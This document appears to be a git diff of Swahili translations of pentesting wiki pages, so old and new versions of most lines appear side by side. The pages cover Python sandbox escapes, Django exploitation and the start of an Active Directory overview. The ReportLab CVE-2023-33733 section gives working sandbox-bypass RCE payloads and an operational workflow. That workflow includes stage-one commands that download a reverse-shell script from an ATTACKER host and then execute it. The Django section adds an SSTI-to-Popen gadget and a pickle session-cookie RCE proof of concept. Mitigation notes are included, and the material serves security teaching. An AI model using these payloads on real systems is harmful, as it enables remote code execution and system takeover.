> Ikiwa unataka **kujifunza** kuhusu **python bytecode** kwa undani soma chapisho hiki **kizuri** juu ya mada hiyo: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
> Ikiwa unataka **kujifunza** kuhusu **python bytecode** kwa undani, soma chapisho hiki **zuri** kuhusu mada hiyo: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
Kwenye baadhi ya CTFs unaweza kupatiwa jina la **custom function where the flag** na unahitaji kuona **internals** za **function** ili kuipata.
Katika baadhi ya CTFs unaweza kupewa jina la **custom function where the flag** inayokaa na unahitaji kuona **internals** za **function** ili kuichota.
Hii ndiyo function ya kuchunguza:
```python
@ -807,7 +807,7 @@ dir(get_flag) #Get info tof the function
```
#### globals
`__globals__` and `func_globals`(Same) Hupata mazingira ya global. Katika mfano unaweza kuona baadhi ya modules zilizoinzwa, baadhi ya global variables na yaliyomo yameainishwa:
`__globals__` and `func_globals`(Same) hupata global environment. Katika mfano unaweza kuona baadhi ya imported modules, baadhi ya global variables na yaliyomo yao yaliyotangazwa:
```python
get_flag.func_globals
get_flag.__globals__
@ -818,9 +818,9 @@ CustomClassObject.__class__.__init__.__globals__
```
[**See here more places to obtain globals**](#globals-and-locals)
### **Kupata function code**
### **Kupata msimbo wa function**
**`__code__`** na `func_code`: Unaweza **kupata** **sifa** hii ya function ili **kupata code object** ya function.
**`__code__`** and `func_code`: Unaweza **kupata** sifa hii ya function ili **kupata object ya msimbo** ya function.
```python
# In our current example
get_flag.__code__
@ -908,7 +908,7 @@ dis.dis(get_flag)
44 LOAD_CONST 0 (None)
47 RETURN_VALUE
```
Kumbuka kwamba **ikiwa huwezi import `dis` katika python sandbox** unaweza kupata **bytecode** ya function (`get_flag.func_code.co_code`) na **disassemble** yake kwenye mashine yako. Hautaona yaliyomo ya variables zinazosomwa (`LOAD_CONST`) lakini unaweza kuyakisia kutoka (`get_flag.func_code.co_consts`) kwa sababu `LOAD_CONST` pia inaonyesha offset ya variable inayosomwa.
Kumbuka kwamba **ikiwa hauwezi ku-import `dis` kwenye python sandbox** unaweza kupata **bytecode** ya function (`get_flag.func_code.co_code`) na **disassemble** yake kwenye mashine yako. Hautaona yaliyomo ya variables zinapopakuliwa (`LOAD_CONST`), lakini unaweza kuyakisia kutoka (`get_flag.func_code.co_consts`) kwa sababu `LOAD_CONST` pia inaonyesha offset ya variable inayopakiwa.
```python
dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S')
0 LOAD_CONST 1 (1)
@ -930,10 +930,10 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
44 LOAD_CONST 0 (0)
47 RETURN_VALUE
```
## Ku-compile Python
## Kukusanya Python
Sasa, tuchukulie kwamba kwa namna fulani unaweza **kutoa taarifa kuhusu function ambayo huwezi kuitekeleza** lakini unahitaji **kuitekeleza**.\
Kama katika mfano ufuatao, unaweza **kupata code object** ya function hiyo, lakini kwa kusoma tu disassemble hujui jinsi ya kuhesabu flag (_fikiria `calc_flag` function yenye ugumu zaidi_)
Sasa, hebu tuseme kwa namna fulani unaweza **dump taarifa kuhusu function ambayo huwezi kutekeleza** lakini **unahitaji** **kutekeleza** hiyo.\
Kama katika mfano ufuatao, **unaweza kufikia code object** ya function hiyo, lakini kwa kusoma disassemble tu **hujui jinsi ya kuhesabu flag** (_fikiri function ya `calc_flag` ngumu zaidi_)
```python
def get_flag(some_input):
var1=1
@ -946,9 +946,9 @@ return calc_flag("VjkuKuVjgHnci")
else:
return "Nope"
```
### Creating the code object
### Kuunda code object
Kwanza kabisa, tunahitaji kujua **how to create and execute a code object** ili tuweze kuunda moja ili ku-execute function yetu leaked:
Kwanza kabisa, tunahitaji kujua **how to create and execute a code object** ili tuweze kuunda moja kutekeleza function yetu leaked:
```python
code_type = type((lambda: None).__code__)
# Check the following hint if you get an error in calling this
@ -968,7 +968,7 @@ mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
```
> [!TIP]
> Kulingana na toleo la python, **parameters** za `code_type` zinaweza kuwa na **mpangilio tofauti**. Njia bora ya kujua mpangilio wa params katika toleo la python unalolotumia ni kuendesha:
> Kulingana na toleo la python, **parameters** za `code_type` zinaweza kuwa na **mpangilio tofauti**. Njia bora ya kujua mpangilio wa params katika toleo la python unayokimbia ni kuendesha:
>
> ```
> import types
@ -979,7 +979,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
### Kuunda upya leaked function
> [!WARNING]
> Katika mfano ufuatao, tutachukua data zote zinazohitajika kuunda upya function kutoka kwa function code object moja kwa moja. Katika **mfano halisi**, thamani zote za kuendesha function **`code_type`** ndizo ambazo **utahitaji leak**.
> Katika mfano ufuatao, tutachukua data zote zinazohitajika kuunda upya function kutoka kwa function code object moja kwa moja. Katika **mfano wa kweli**, **values** zote za kuendesha function **`code_type`** ndizo ambazo **utahitaji leak**.
```python
fc = get_flag.__code__
# In a real situation the values like fc.co_argcount are the ones you need to leak
@ -990,12 +990,12 @@ mydict['__builtins__'] = __builtins__
function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag
```
### Kuvuka Kinga
### Bypass Defenses
Katika mifano ya awali mwanzoni mwa chapisho hiki, unaweza kuona **jinsi ya kutekeleza code yoyote ya python ukitumia `compile` function**. Hii ni ya kuvutia kwa sababu unaweza **kutekeleza skripti nzima** zenye mizunguko na kila kitu katika **mstari mmoja** (na tunaweza kufanya hivyo pia kwa kutumia **`exec`**).\
Hata hivyo, wakati mwingine inaweza kuwa muhimu **kuunda** **compiled object** kwenye mashine ya ndani na kuitekeleza kwenye **CTF machine** (kwa mfano kwa sababu hatuna `compiled` function kwenye CTF).
Katika mifano ya awali mwanzoni mwa chapisho hili, unaweza kuona **jinsi ya kutekeleza code yoyote ya python ukitumia `compile` function**. Hii ni ya kuvutia kwa sababu unaweza **kutekeleza skripti nzima** zenye loops na kila kitu katika **one liner** (na tunaweza kufanya hivyo pia kwa kutumia **`exec`**).\
Hata hivyo, wakati mwingine inaweza kuwa muhimu **kuunda** **compiled object** kwenye mashine ya ndani na kuiendesha kwenye **CTF machine** (kwa mfano kwa sababu hatuna `compiled` function katika CTF).
Kwa mfano, hebu tucompile na tuitekeleze kwa mkono function inayosoma _./poc.py_:
Kwa mfano, hebu tu-compile na kukimbia kwa mkono function inayosoma _./poc.py_:
```python
#Locally
def read():
@ -1022,7 +1022,7 @@ mydict['__builtins__'] = __builtins__
codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
function_type(codeobj, mydict, None, None, None)()
```
Ikiwa huwezi kufikia `eval` au `exec` unaweza kuunda **function inayofaa**, lakini kuitisha moja kwa moja kawaida itashindwa na: _constructor haipatikani katika hali iliyodhibitiwa_. Kwa hivyo unahitaji **function isiyokuwa katika mazingira yaliyodhibitiwa ili kuitisha function hii.**
Iwapo huwezi kufikia `eval` au `exec` unaweza kuunda **kazi inayofaa**, lakini kuiita moja kwa moja kwa kawaida itashindwa na: _constructor not accessible in restricted mode_. Kwa hivyo unahitaji **kazi ambayo haiko katika mazingira yenye vikwazo ili kuita kazi hii.**
```python
#Compile a regular print
ftype = type(lambda: None)
@ -1030,9 +1030,9 @@ ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)
```
## Decompiling Compiled Python
## Kupandua Python Iliyokompiwa
Kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com) mtu anaweza **ku-decompile** msimbo wa Python uliokusanywa.
Kwa kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com) mtu anaweza **decompile** msimbo wa Python uliokompiwa.
**Angalia mafunzo haya**:
@ -1041,11 +1041,11 @@ Kutumia zana kama [**https://www.decompiler.com/**](https://www.decompiler.com)
../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
{{#endref}}
## Python Mbalimbali
## Mambo Mengine ya Python
### Assert
Python inayotekelezwa kwa maboresho kwa kutumia parameta `-O` itaondoa assert statements na code yoyote inayotegemea thamani ya **debug**.\
Python inayotekelezwa kwa uboreshaji kwa parameta `-O` itaondoa assert statements na sehemu yoyote ya msimbo inayotegemea thamani ya **debug**.\
Kwa hivyo, ukaguzi kama
```python
def check_permission(super_user):
@ -1055,9 +1055,9 @@ print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")
```
itaepukwa
itatapita pembeni
## Marejeleo
## Marejeo
- [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
- [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)

96
src/generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
View File

@ -1,53 +1,53 @@
# ReportLab/xhtml2pdf [[[...]]] expression-evaluation RCE (CVE-2023-33733)
# ReportLab/xhtml2pdf [[[...]]] utendaji wa tathmini ya expression RCE (CVE-2023-33733)
{{#include ../../../banners/hacktricks-training.md}}
Ukurasa huu unaandika kuhusu escape ya sandbox na primitive ya RCE katika rl_safe_eval ya ReportLab inayotumika na xhtml2pdf na pipeline nyingine za PDF-generation wakati zinatengeneza HTML inayodhibitiwa na mtumiaji kuwa PDF.
Ukurasa huu unaelezea uhamisho wa sandbox na primitive ya RCE katika rl_safe_eval ya ReportLab inayotumika na xhtml2pdf na pipeline nyingine za kuunda PDF wanapofanya render HTML inayodhibitiwa na mtumiaji kuwa PDF.
CVE-2023-33733 inaathiri matoleo ya ReportLab hadi na pamoja na 3.6.12. Katika muktadha fulani wa attribute (kwa mfano color), thamani zilizowekwa ndani ya triple brackets [[[ ... ]]] zinatathminiwa server-side na rl_safe_eval. Kwa kuunda payload inayopinduka kutoka kwa builtin iliyoorodheshwa njiani (pow) hadi globals za function ya Python, mshambuliaji anaweza kufikia module ya os na kutekeleza amri.
CVE-2023-33733 inaathiri ReportLab kwa toleo hadi na pamoja na 3.6.12. Katika muktadha fulani wa attribute (kwa mfano color), values zilizowekwa ndani ya triple brackets [[[ ... ]]] zinatathminiwa server-side na rl_safe_eval. Kwa kutengeneza payload inayopita kutoka kwa builtin iliyoruhusiwa (pow) hadi globals za function ya Python, mshambuliaji anaweza kufikia module ya os na kutekeleza amri.
Key points
- Trigger: inject [[[ ... ]]] into evaluated attributes such as <font color="..."> within markup parsed by ReportLab/xhtml2pdf.
- Sandbox: rl_safe_eval replaces dangerous builtins but evaluated functions still expose __globals__.
- Bypass: craft a transient class Word to bypass rl_safe_eval name checks and access the string "__globals__" while avoiding blocked dunder filtering.
Mambo muhimu
- Vichocheo: weka [[[ ... ]]] ndani ya attributes zinazothaminiwa kama <font color="..."> ndani ya markup inayochambuliwa na ReportLab/xhtml2pdf.
- Sandbox: rl_safe_eval inabadilisha builtins hatari lakini functions zilizothaminiwa bado zinaonyesha __globals__.
- Bypass: tengeneza darasa la muda mfupi Word kupita ukaguzi wa majina wa rl_safe_eval na kufikia string "__globals__" huku ukiepuka uchujaji wa dunder uliokatazwa.
- RCE: getattr(pow, Word("__globals__"))["os"].system("<cmd>")
- Stability: Return a valid value for the attribute after execution (for color, use and 'red').
- Utulivu: Rudisha value halali kwa attribute baada ya utekelezaji (kwa color, tumia na 'red').
When to test
- Applications that expose HTML-to-PDF export (profiles, invoices, reports) and show xhtml2pdf/ReportLab in PDF metadata or HTTP response comments.
Wakati wa kujaribu
- Programu zinazotoa HTML-to-PDF export (profiles, invoices, reports) na zinaonyesha xhtml2pdf/ReportLab katika metadata ya PDF au maoni ya HTTP response.
- exiftool profile.pdf | egrep 'Producer|Title|Creator' → "xhtml2pdf" producer
- HTTP response for PDF often starts with a ReportLab generator comment
- HTTP response kwa PDF mara nyingi huanza na comment ya generator ya ReportLab
How the sandbox bypass works
- rl_safe_eval removes or replaces many builtins (getattr, type, pow, ...) and applies name filtering to deny attributes starting with __ or in a denylist.
- However, safe functions live in a globals dictionary accessible as func.__globals__.
- Use type(type(1)) to recover the real builtin type function (bypassing ReportLabs wrapper), then define a Word class derived from str with mutated comparison behavior so that:
- .startswith('__') → always False (bypass name startswith('__') check)
- .__eq__ returns False only at first comparison (bypass denylist membership checks) and True afterwards (so Python getattr works)
- .__hash__ equals hash(str(self))
- With this, getattr(pow, Word('__globals__')) returns the globals dict of the wrapped pow function, which includes an imported os module. Then: ['os'].system('<cmd>').
Jinsi mbinu ya kuipita sandbox inavyofanya kazi
- rl_safe_eval inaondoa au kubadilisha builtins nyingi (getattr, type, pow, ...) na inatumia uchujaji wa majina kuzuia attributes zinazoanza na __ au zilizo kwenye denylist.
- Hata hivyo, functions salama huishi katika kamusi ya globals inayopatikana kama func.__globals__.
- Tumia type(type(1)) kupata function ya builtin type halisi (kupitia wrapper ya ReportLab), kisha tambua darasa Word lenye urithi kutoka str na tabia iliyobadilishwa ya kulinganisha ili:
- .startswith('__') → daima False (kupita ukaguzi wa startswith('__'))
- .__eq__ inarudisha False tu kwa ulinganishaji wa kwanza (kupita ukaguzi wa denylist) na True baadaye (hivyo getattr inafanya kazi)
- .__hash__ ni sawa na hash(str(self))
- Kwa hili, getattr(pow, Word('__globals__')) inarudisha kamusi ya globals ya function iliyofungwa pow, ambayo inajumuisha module ya os iliyolazimishwa. Kisha: ['os'].system('<cmd>').
Minimal exploitation pattern (attribute example)
Place payload inside an evaluated attribute and ensure it returns a valid attribute value via boolean and 'red'.
Mfano wa u exploit mdogo (mfano wa attribute)
Weka payload ndani ya attribute inayothaminiwa na hakikisha inarudisha value halali ya attribute kwa kutumia boolean na 'red'.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('ping 10.10.10.10') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
- The list-comprehension form allows a single expression acceptable to rl_safe_eval.
- The trailing and 'red' returns a valid CSS color so the rendering doesnt break.
- Replace the command as needed; use ping to validate execution with tcpdump.
- Fomu ya list-comprehension inaruhusu expression moja inayokubalika kwa rl_safe_eval.
- Mwisho na 'red' unarudisha rangi ya CSS halali kiasi kwamba rendering haisivunjike.
- Badilisha amri kulingana na mahitaji; tumia ping kuthibitisha utekelezaji kwa tcpdump.
Operational workflow
1) Identify PDF generator
- PDF Producer shows xhtml2pdf; HTTP response contains ReportLab comment.
2) Find an input reflected into the PDF (e.g., profile bio/description) and trigger an export.
3) Verify execution with low-noise ICMP
- Run: sudo tcpdump -ni <iface> icmp
Mfumo wa uendeshaji
1) Tambua PDF generator
- PDF Producer inaonyesha xhtml2pdf; HTTP response ina comment ya ReportLab.
2) Pata input inayoreflektwa ndani ya PDF (kwa mfano, profile bio/description) na chochea export.
3) Thibitisha utekelezaji kwa ICMP yenye kelele ndogo
- Endesha: sudo tcpdump -ni <iface> icmp
- Payload: ... system('ping <your_ip>') ...
- Windows often sends exactly four echo requests by default.
4) Establish a shell
- For Windows, a reliable two-stage approach avoids quoting/encoding issues:
- Windows mara nyingi hutuma echo requests nne tu kwa default.
4) Anzisha shell
- Kwa Windows, mbinu ya hatua mbili ya kuaminika inazuia matatizo ya quoting/encoding:
- Stage 1 (download):
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -c iwr http://ATTACKER/rev.ps1 -o rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
@ -56,24 +56,24 @@ Operational workflow
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell ./rev.ps1') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
- For Linux targets, similar two-stage with curl/wget is possible:
- Kwa targets za Linux, njia ya hatua mbili sawa inapatikana kwa curl/wget:
- system('curl http://ATTACKER/s.sh -o /tmp/s; sh /tmp/s')
Notes and tips
- Attribute contexts: color is a known evaluated attribute; other attributes in ReportLab markup may also evaluate expressions. If one location is sanitized, try others rendered into the PDF flow (different fields, table styles, etc.).
- Quoting: Keep commands compact. Two-stage downloads drastically reduce quoting and escaping headaches.
- Reliability: If exports are cached or queued, slightly vary the payload (e.g., random path or query) to avoid hitting caches.
Vidokezo na ushauri
- Muktadha wa attribute: color ni attribute inayojulikana inayothaminiwa; attributes nyingine katika ReportLab markup zinaweza pia kuthamini expressions. Ikiwa sehemu moja imesafishwa, jaribu sehemu nyingine zinazochorwa ndani ya mtiririko wa PDF (fields tofauti, table styles, n.k.).
- Quoting: Weka amri fupi. Upakuaji wa hatua mbili unapunguza kwa kiasi kikubwa matatizo ya quoting na escaping.
- Uaminifu: Ikiwa exports zimekaa au zimepangwa, badilisha kidogo payload (kwa mfano, path au query ya nasibu) ili kuepuka caches.
Mitigations and detection
- Upgrade ReportLab to 3.6.13 or later (CVE-2023-33733 fixed). Track security advisories in distro packages as well.
- Do not feed user-controlled HTML/markup directly into xhtml2pdf/ReportLab without strict sanitization. Remove/deny [[[...]]] evaluation constructs and vendor-specific tags when input is untrusted.
- Consider disabling or wrapping rl_safe_eval usage entirely for untrusted inputs.
- Monitor for suspicious outbound connections during PDF generation (e.g., ICMP/HTTP from app servers when exporting documents).
Uzuiaji na utambuzi
- Sasisha ReportLab hadi 3.6.13 au baadaye (CVE-2023-33733 imerekebishwa). Fuata advisories za usalama pia katika packages za distro.
- Usiruhusu HTML/markup inayodhibitiwa na watumiaji kuingizwa moja kwa moja ndani ya xhtml2pdf/ReportLab bila kusafishwa kwa ukali. Ondoa/kataa tathmini ya [[[...]]] na tags za vendor wakati input haijatumika.
- Fikiria kuzima au kufunika matumizi ya rl_safe_eval kabisa kwa inputs zisizoaminika.
- Angalia kwa miunganisho ya kutarajia kutoka nje wakati wa uundaji wa PDF (kwa mfano, ICMP/HTTP kutoka servers za app wakati wa ku-export hati).
References
- PoC and technical analysis: [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
- 0xdf University HTB write-up (real-world exploitation, Windows two-stage payloads): [HTB: University](https://0xdf.gitlab.io/2025/08/09/htb-university.html)
- NVD entry (affected versions): [CVE-2023-33733](https://nvd.nist.gov/vuln/detail/cve-2023-33733)
- xhtml2pdf docs (markup/page concepts): [xhtml2pdf docs](https://xhtml2pdf.readthedocs.io/en/latest/format_html.html)
Marejeo
- PoC na uchambuzi wa kiufundi: [c53elyas/CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733)
- 0xdf University HTB write-up (uukaji wa dunia halisi, Windows two-stage payloads): [HTB: University](https://0xdf.gitlab.io/2025/08/09/htb-university.html)
- Kuingia kwa NVD (mifano iliyoharibika): [CVE-2023-33733](https://nvd.nist.gov/vuln/detail/cve-2023-33733)
- nyaraka za xhtml2pdf (dhana za markup/ukurasa): [xhtml2pdf docs](https://xhtml2pdf.readthedocs.io/en/latest/format_html.html)
{{#include ../../../banners/hacktricks-training.md}}

36
src/network-services-pentesting/pentesting-web/django.md
View File

@ -3,9 +3,9 @@
{{#include ../../banners/hacktricks-training.md}}
## Cache Manipulation to RCE
Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **Ikiwa attacker anaweza kupata write access kwa cache, wataweza kuinua hitilafu hii hadi RCE kwenye server ya msingi**.
Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **Ikiwa mshambuliaji anaweza kupata ufikiaji wa kuandika kwenye cache, wanaweza kupanua udhaifu huu hadi RCE kwenye server ya msingi**.
Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95). Cache stored in a Redis server or database are the most likely attack vectors (Redis injection and SQL injection), but an attacker may also be able to use file-based cache to turn an arbitrary write into RCE. Watunzaji wameitaja hii kama non-issue. Ni muhimu kutambua kwamba folda ya faili za cache, jina la jedwali la SQL, na maelezo ya Redis server yatatofautiana kulingana na utekelezaji.
Django cache is stored in one of four places: [Redis](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/redis.py#L12), [memory](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/locmem.py#L16), [files](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/filebased.py#L16), or a [database](https://github.com/django/django/blob/48a1929ca050f1333927860ff561f6371706968a/django/core/cache/backends/db.py#L95). Cache iliyohifadhiwa kwenye server ya Redis au database ndizo vigezo vya shambulio vinavyowezekana zaidi (Redis injection na SQL injection), lakini mshambuliaji anaweza pia kutumia cache ya aina ya file-based kugeuza uandishi wowote kuwa RCE. Watunzaji wametaja hili kuwa suala lisilo la wasiwasi. Ni muhimu kutambua kwamba folda ya cache file, jina la jedwali la SQL, na maelezo ya server ya Redis yatatofautiana kulingana na utekelezaji.
This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436
@ -14,31 +14,31 @@ This HackerOne report provides a great, reproducible example of exploiting Djang
## Server-Side Template Injection (SSTI)
The Django Template Language (DTL) is **Turing-complete**. If user-supplied data is rendered as a *template string* (for example by calling `Template(user_input).render()` or when `|safe`/`format_html()` removes auto-escaping), an attacker may achieve full SSTI → RCE.
### Utambuzi
1. Tafuta miito ya dinamik kwa `Template()` / `Engine.from_string()` / `render_to_string()` ambazo zinajumuisha *data yoyote* ya ombi isiyosafishwa.
2. Tuma payload ya msingi wa muda au hisabati:
### Detection
1. Look for dynamic calls to `Template()` / `Engine.from_string()` / `render_to_string()` that include *any* unsanitised request data.
2. Send a time-based or arithmetic payload:
```django
{{7*7}}
```
If the rendered output contains `49` the input is compiled by the template engine.
### Kigezo cha kufikia RCE
### Primitive to RCE
Django blocks direct access to `__import__`, but the Python object graph is reachable:
```django
{{''.__class__.mro()[1].__subclasses__()}}
```
Pata index ya `subprocess.Popen` (≈400500 kulingana na ujenzi wa Python) na tekeleza amri zozote:
Pata index ya `subprocess.Popen` (≈400500, kutegemea build ya Python) na execute arbitrary commands:
```django
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
```
Gadget salama zaidi ya jumla ni kurudia mpaka `cls.__name__ == 'Popen'`.
Gadget universal salama ni kurudia hadi `cls.__name__ == 'Popen'`.
Gadget hiyo hiyo inafanya kazi pia kwa vipengele vya uwasilishaji vya template vya **Debug Toolbar** au **Django-CMS** vinavyoshughulikia vibaya ingizo la mtumiaji.
The same gadget works for **Debug Toolbar** or **Django-CMS** template rendering features that mishandle user input.
---
### Angalia pia: ReportLab/xhtml2pdf PDF export RCE
Programu zinazojengwa juu ya Django kwa kawaida huingiza xhtml2pdf/ReportLab ili kutengeneza views kama PDF. Wakati HTML inayodhibitiwa na mtumiaji inaingia kwenye uzalishaji wa PDF, rl_safe_eval inaweza kutathmini expressions ndani ya mabano matatu `[[[ ... ]]]` ikiruhusu utekelezaji wa msimbo (CVE-2023-33733). Maelezo, payloads, na mbinu za kupunguza:
Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets `[[[ ... ]]]` enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:
{{#ref}}
../../generic-methodologies-and-resources/python/bypass-python-sandboxes/reportlab-xhtml2pdf-triple-brackets-expression-evaluation-rce-cve-2023-33733.md
@ -46,14 +46,14 @@ Programu zinazojengwa juu ya Django kwa kawaida huingiza xhtml2pdf/ReportLab ili
---
## Pickle-Backed Session Cookie RCE
## RCE ya Session Cookie iliyotegemea Pickle
If the setting `SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'` is enabled (or a custom serializer that deserialises pickle), Django *decrypts and unpickles* the session cookie **before** calling any view code. Therefore, possessing a valid signing key (the project `SECRET_KEY` by default) is enough for immediate remote code execution.
### Mahitaji ya Exploit
* Seva inatumia `PickleSerializer`.
* Server inatumia `PickleSerializer`.
* Mshambuliaji anajua / anaweza kukisia `settings.SECRET_KEY` (leaks via GitHub, `.env`, error pages, etc.).
### Uthibitisho wa Dhana
### Proof-of-Concept
```python
#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
@ -69,15 +69,15 @@ print(f"sessionid={mal}")
```
Tuma cookie iliyopatikana, na payload itaendeshwa kwa ruhusa za WSGI worker.
**Mikakati ya kupunguza hatari**: Endelea kutumia default `JSONSerializer`, badilisha `SECRET_KEY` mara kwa mara, na sanidi `SESSION_COOKIE_HTTPONLY`.
**Mitigations**: Tumia `JSONSerializer` ya default, badilisha `SECRET_KEY` mara kwa mara, na sanidi `SESSION_COOKIE_HTTPONLY`.
---
## CVE za Django Zenye Athari Kubwa (2023-2025) Zinazopaswa Kukaguliwa na Pentesters
* **CVE-2025-48432** *Log Injection via unescaped `request.path`* (ilirekebishwa 4 Jun 2025). Inaruhusu washambuliaji kuingiza newlines/ANSI codes ndani ya faili za log na kuharibu uchambuzi wa log unaofuata. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Unda JSON keys ili kuvunja quoting na kutekeleza SQL yoyote. Imerekebishwa katika 4.2.15 / 5.0.8.
## CVE za Django za Matokeo Makubwa (2023-2025) Pentesters Wanazopaswa Kukagua
* **CVE-2025-48432** *Log Injection via unescaped `request.path`* (fixed June 4 2025). Inaruhusu mashambulizi kusafirisha newlines/ANSI codes ndani ya faili za log na kuchafua uchambuzi wa log unaofuata. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
* **CVE-2024-42005** *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Unda funguo za JSON ili kuvunja quoting na kutekeleza SQL yoyote. Fixed in 4.2.15 / 5.0.8.
Daima tambua toleo halisi la framework kupitia ukurasa wa kosa wa `X-Frame-Options` au hash ya `/static/admin/css/base.css` na jaribu vipengele hapo juu pale inapofaa.
Daima tambua (fingerprint) toleo halisi la framework kupitia ukurasa wa kosa wa `X-Frame-Options` au hash ya `/static/admin/css/base.css` na jaribu vipengele vilivyotajwa hapo juu pale inapofaa.
---

363
src/windows-hardening/active-directory-methodology/README.md
View File

@ -4,26 +4,26 @@
## Muhtasari wa Msingi
**Active Directory** ni teknolojia ya msingi inayomruhusu **wasimamizi wa mtandao** kuunda na kusimamia kwa ufanisi **domains**, **users**, na **objects** ndani ya mtandao. Imetengenezwa ili kustahimili ukuaji, ikiruhusu kupanga idadi kubwa ya watumiaji katika **groups** na **subgroups** zinazoweza kusimamiwa, huku ikidhibiti **access rights** kwa ngazi mbalimbali.
**Active Directory** ni teknolojia ya msingi, inayowezesha **network administrators** kuunda na kusimamia kwa ufanisi **domains**, **users**, na **objects** ndani ya mtandao. Imetengenezwa ili iweze kupanuka, ikisaidia kupanga idadi kubwa ya watumiaji katika **groups** na **subgroups** zinazoweza kudhibitiwa, sambamba na kudhibiti **access rights** kwa ngazi mbalimbali.
Muundo wa **Active Directory** una tabaka kuu tatu: **domains**, **trees**, na **forests**. **Domain** inajumuisha mkusanyiko wa objects, kama **users** au **devices**, wanaoshiriki database ya pamoja. **Trees** ni vikundi vya domains vinavyounganishwa kwa muundo wa pamoja, na **forest** ni mkusanyiko wa miti kadhaa zinazohusishwa kupitia **trust relationships**, zikifanya safu ya juu kabisa ya muundo wa shirika. Haki maalum za **access** na **communication** zinaweza kuwekwa katika kila moja ya ngazi hizi.
